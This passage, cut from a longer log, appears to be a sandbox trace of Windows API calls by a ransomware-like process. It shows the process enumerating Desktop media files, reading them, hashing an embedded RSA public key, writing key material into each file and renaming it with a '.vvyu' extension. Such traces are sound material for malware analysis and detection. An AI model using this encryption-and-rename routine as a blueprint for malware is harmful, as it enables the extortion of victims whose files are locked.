hFile=0x584, liDistanceToMove=0x1360e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.442] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.444] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.444] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.444] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.444] CloseHandle (hObject=0x584) returned 1 [0188.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0188.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.446] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\nFEQU_fXuy ewF.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\nfequ_fxuy ewf.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\nFEQU_fXuy ewF.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\nfequ_fxuy ewf.mkv.vvyu")) returned 1 [0188.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.449] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.452] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa97270d0, ftCreationTime.dwHighDateTime=0x1d89a6a, ftLastAccessTime.dwLowDateTime=0xccaa7f30, ftLastAccessTime.dwHighDateTime=0x1d89b59, ftLastWriteTime.dwLowDateTime=0xccaa7f30, ftLastWriteTime.dwHighDateTime=0x1d89b59, nFileSizeHigh=0x0, nFileSizeLow=0x6d2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Rwzd9mw.mp4", cAlternateFileName="")) returned 1 [0188.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2698 [0188.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2698 | out: hHeap=0x2c0000) returned 1 [0188.453] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\Rwzd9mw.mp4") returned=".mp4" [0188.453] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\Rwzd9mw.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\rwzd9mw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.453] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=27949) returned 1 [0188.453] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.457] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6d07, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.457] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.458] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.458] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x6d2d, lpOverlapped=0x0) returned 1 [0188.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.459] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.459] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.460] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.460] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.460] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.460] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.460] GetLastError () returned 0x0 [0188.460] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.460] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.461] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.461] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.461] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6d30) returned 0x2ae3ea0 [0188.461] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2698 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae26e0 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d958 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.462] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2aeabd8 [0188.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeabd8 | out: hHeap=0x2c0000) returned 1 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d940 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0188.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0188.465] GetCurrentThreadId () returned 0x5d8 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee530 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.465] GetCurrentThreadId () returned 0x5d8 [0188.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9a0 [0188.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d940 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9b8 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d988 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d970 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d9d0 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d970 [0188.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d988 | out: hHeap=0x2c0000) returned 1 [0188.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2aeabd8 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9a0 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9d0 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2aeade8 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2aeb000 [0188.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeade8 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeb000 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d970 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9b8 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 